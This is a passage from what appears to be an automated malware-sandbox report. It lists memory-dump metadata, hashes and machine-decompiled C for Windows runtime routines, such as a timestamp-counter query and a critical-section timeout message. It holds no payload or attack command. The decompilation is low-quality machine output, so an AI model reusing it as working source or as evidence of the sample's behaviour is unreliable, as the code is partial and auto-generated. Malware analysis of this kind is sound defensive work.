                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: User
                                                  • String ID:
                                                  • API String ID: 765557111-0
                                                  • Opcode ID: 192d1dc557fdcd1f2abf0cd98871ab39a043c43d1ecbfc7256f5f81224423b0b
                                                  • Instruction ID: 5511db123bae7081b5c05f1d5b2e2ca497d436f1bbdd44a9c892e0a4e36ad1e7
                                                  • Opcode Fuzzy Hash: 192d1dc557fdcd1f2abf0cd98871ab39a043c43d1ecbfc7256f5f81224423b0b
                                                  • Instruction Fuzzy Hash: 2FE0C23328030827F624E5A98C52FA6328E5B84B04F088475F90CE72C2D5A9E5800024
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ExitProcess.KERNEL32(?,00000000,000000E6,?,?,00000001), ref: 0041E21F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                                  • Instruction ID: 71b31a6e052b90d658ead73e1ea1e15e08fcd2b9b7f1fc59455b7fbc18c8b61a
                                                  • Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                                  • Instruction Fuzzy Hash: 15D0C2313002187BC620DB89CC45FD3379CDF457A4F004065BA0C5B241C530BA00C7E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                  • Instruction ID: fd774d3b0bc61d3a7aa453021c1500bd91abd8bee620a0c201bc48005ce4c1ae
                                                  • Opcode Fuzzy Hash: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                  • Instruction Fuzzy Hash: 6DB09B729014C5C5E751D7E146087277E40BBD0741F16C065E2034645A4778C491F5B6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 66%
                                                  			E00AE6A60(intOrPtr* _a4) {
                                                  				signed int _v8;
                                                  				char _v24;
                                                  				signed char _v25;
                                                  				intOrPtr* _v32;
                                                  				signed char _v36;
                                                  				signed int _v40;
                                                  				intOrPtr* _v44;
                                                  				char _v48;
                                                  				intOrPtr _v52;
                                                  				char _v56;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr* _v68;
                                                  				signed char _v72;
                                                  				signed char _v76;
                                                  				intOrPtr _v80;
                                                  				intOrPtr _v84;
                                                  				signed char _v88;
                                                  				signed int _v92;
                                                  				signed char _v96;
                                                  				char _v100;
                                                  				signed int _v104;
                                                  				void* _v116;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t101;
                                                  				void* _t105;
                                                  				signed int _t112;
                                                  				signed int* _t113;
                                                  				signed int* _t114;
                                                  				intOrPtr _t117;
                                                  				intOrPtr _t118;
                                                  				void* _t122;
                                                  				signed int _t127;
                                                  				intOrPtr* _t128;
                                                  				signed int _t131;
                                                  				signed char _t134;
                                                  				signed int _t136;
                                                  				intOrPtr* _t138;
                                                  				intOrPtr* _t139;
                                                  				intOrPtr _t143;
                                                  				signed char _t144;
                                                  				signed short _t145;
                                                  				signed char _t146;
                                                  				intOrPtr* _t147;
                                                  				intOrPtr _t148;
                                                  				void* _t150;
                                                  				char _t152;
                                                  				signed int _t153;
                                                  				signed char _t154;
                                                  
                                                  				_v8 =  *0xbad360 ^ _t153;
                                                  				_t144 =  *0x7ffe03c6;
                                                  				_v25 = _t144;
                                                  				_t128 = _a4;
                                                  				_v44 = _t128;
                                                  				if((_t144 & 0x00000001) == 0) {
                                                  					L54:
                                                  					_push(0);
                                                  					_push( &_v100);
                                                  					E00AF9810();
                                                  					 *_t128 = _v100;
                                                  					 *(_t128 + 4) = _v96;
                                                  					goto L20;
                                                  				} else {
                                                  					do {
                                                  						_t148 =  *0x7ffe03b8;
                                                  						_t134 =  *0x7FFE03BC;
                                                  						_t146 =  *0x7FFE03BC;
                                                  						_v60 = _t148;
                                                  						_v76 = _t134;
                                                  					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
                                                  					_t128 = _v44;
                                                  					if((_t144 & 0x00000002) != 0) {
                                                  						_t147 =  *0xba6908; // 0x0
                                                  						_v68 = _t147;
                                                  						if(_t147 == 0) {
                                                  							goto L54;
                                                  						} else {
                                                  							goto L22;
                                                  						}
                                                  						while(1) {
                                                  							L22:
                                                  							_t101 =  *_t147;
                                                  							_v32 = _t101;
                                                  							if(_t101 == 0) {
                                                  								break;
                                                  							}
                                                  							if(_t144 >= 0) {
                                                  								if((_t144 & 0x00000020) == 0) {
                                                  									if((_t144 & 0x00000010) != 0) {
                                                  										asm("mfence");
                                                  									}
                                                  								} else {
                                                  									asm("lfence");
                                                  								}
                                                  								asm("rdtsc");
                                                  							} else {
                                                  								asm("rdtscp");
                                                  								_v72 = _t134;
                                                  							}
                                                  							_v52 = _t101;
                                                  							_v84 =  *((intOrPtr*)(_t147 + 8));
                                                  							_v64 =  *((intOrPtr*)(_t147 + 0x10));
                                                  							_v80 =  *((intOrPtr*)(_t147 + 0x14));
                                                  							_t105 = E00AFCF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
                                                  							_t146 = _t144;
                                                  							E00AFCF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
                                                  							_t150 = _t105 + _t144;
                                                  							_t144 = _v25;
                                                  							asm("adc edi, 0x0");
                                                  							_v40 = _t150 + _v64;
                                                  							_t147 = _v68;
                                                  							asm("adc edi, [ebp-0x4c]");
                                                  							_v36 = _t146;
                                                  							if( *_t147 != _v32) {
                                                  								continue;
                                                  							} else {
                                                  								_t128 = _v44;
                                                  								_t147 = _v60;
                                                  								L19:
                                                  								_t144 = _v36;
                                                  								asm("adc edx, [ebp-0x48]");
                                                  								 *_t128 = E00AFD340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
                                                  								 *(_t128 + 4) = _t144;
                                                  								L20:
                                                  								return E00AFB640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
                                                  							}
                                                  						}
                                                  						_t128 = _v44;
                                                  						goto L54;
                                                  					}
                                                  					_v56 = 0xffffffff;
                                                  					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
                                                  						_t136 = 0x14c;
                                                  						L14:
                                                  						_t112 = _t136 & 0x0000ffff;
                                                  						L15:
                                                  						if(_t112 == 0xaa64) {
                                                  							_t113 =  &_v40;
                                                  							_v32 = _t113;
                                                  							_t138 = _v32;
                                                  							asm("int 0x81");
                                                  							 *_t138 = _t113;
                                                  							 *(_t138 + 4) = _t144;
                                                  							if((_t144 & 0x00000040) == 0) {
                                                  								goto L19;
                                                  							}
                                                  							_t114 =  &_v92;
                                                  							_v32 = _t114;
                                                  							_t139 = _v32;
                                                  							asm("int 0x81");
                                                  							 *_t139 = _t114;
                                                  							 *(_t139 + 4) = _t144;
                                                  							_t144 = _v88;
                                                  							if(((_t144 ^ _v36) & 0x00000001) != 0) {
                                                  								goto L19;
                                                  							}
                                                  							_t112 = _v92;
                                                  							L18:
                                                  							_v40 = _t112;
                                                  							_v36 = _t144;
                                                  							goto L19;
                                                  						}
                                                  						if(_t144 >= 0) {
                                                  							if((_t144 & 0x00000020) == 0) {
                                                  								if((_t144 & 0x00000010) != 0) {
                                                  									asm("mfence");
                                                  								}
                                                  							} else {
                                                  								asm("lfence");
                                                  							}
                                                  							asm("rdtsc");
                                                  						} else {
                                                  							asm("rdtscp");
                                                  						}
                                                  						goto L18;
                                                  					}
                                                  					_t117 =  *[fs:0x18];
                                                  					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
                                                  					if(_t143 < 0) {
                                                  						_t117 = _t117 + _t143;
                                                  					}
                                                  					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
                                                  						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
                                                  					} else {
                                                  						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
                                                  					}
                                                  					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
                                                  						L34:
                                                  						_v48 = 0x10;
                                                  						_push( &_v48);
                                                  						_push(0x10);
                                                  						_t146 =  &_v24;
                                                  						_push(_t146);
                                                  						_push(4);
                                                  						_push( &_v56);
                                                  						_push(0xb5);
                                                  						_t122 = E00AFAA90();
                                                  						if(_t122 == 0xc0000023) {
                                                  							_t152 = _v48;
                                                  							E00AFD000(_t152);
                                                  							_t146 = _t154;
                                                  							_push( &_v48);
                                                  							_push(_t152);
                                                  							_push(_t146);
                                                  							_push(4);
                                                  							_push( &_v56);
                                                  							_push(0xb5);
                                                  							_t122 = E00AFAA90();
                                                  							_t147 = _v60;
                                                  						}
                                                  						if(_t122 < 0) {
                                                  							_t112 = _v104;
                                                  							_t144 = _v25;
                                                  							goto L15;
                                                  						} else {
                                                  							_t145 =  *_t146;
                                                  							_t136 = 0;
                                                  							if(_t145 == 0) {
                                                  								L43:
                                                  								_t144 = _v25;
                                                  								goto L14;
                                                  							}
                                                  							_t131 = 0;
                                                  							do {
                                                  								if((_t145 & 0x00040000) != 0) {
                                                  									_t136 = _t145 & 0x0000ffff;
                                                  								}
                                                  								_t145 =  *(_t146 + 4 + _t131 * 4);
                                                  								_t131 = _t131 + 1;
                                                  							} while (_t145 != 0);
                                                  							_t128 = _v44;
                                                  							goto L43;
                                                  						}
                                                  					} else {
                                                  						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
                                                  						if(_t127 == 0) {
                                                  							goto L34;
                                                  						}
                                                  						_t136 = _t127;
                                                  						goto L14;
                                                  					}
                                                  				}
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d4bf0e0b0c2cad305c4a911d5bdf81bbba6727cb70eea3b7a67e71bbcc94052
                                                  • Instruction ID: 312871a65d2b78773a4b3c6c913d64b3d6df58c572204725ce4c2b92a75a6df6
                                                  • Opcode Fuzzy Hash: 8d4bf0e0b0c2cad305c4a911d5bdf81bbba6727cb70eea3b7a67e71bbcc94052
                                                  • Instruction Fuzzy Hash: 4C81AE71E442699FCB10CF99D981BEEBBF5EF18340F1480A9E948EB241D735AC05CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  C-Code - Quality: 53%
                                                  			E00B4FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                  				void* _t7;
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t10;
                                                  				intOrPtr* _t12;
                                                  				intOrPtr* _t13;
                                                  				intOrPtr _t14;
                                                  				intOrPtr* _t15;
                                                  
                                                  				_t13 = __edx;
                                                  				_push(_a4);
                                                  				_t14 =  *[fs:0x18];
                                                  				_t15 = _t12;
                                                  				_t7 = E00AFCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                  				_push(_t13);
                                                  				E00B45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                  				_t9 =  *_t15;
                                                  				if(_t9 == 0xffffffff) {
                                                  					_t10 = 0;
                                                  				} else {
                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                  				}
                                                  				_push(_t10);
                                                  				_push(_t15);
                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                  				return E00B45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                  			}










                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B4FDFA
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B4FE2B
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B4FE01
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                  • Instruction ID: 1f4e07b77d35b4ba5142125bbdeffbf0eaf4acf1dba3b77c0922343a4df4e460
                                                  • Opcode Fuzzy Hash: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                  • Instruction Fuzzy Hash: 71F0F632240605BFD6201A45DD02F33BB9AEB45730F240364F628565E2DA62FD30A7F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%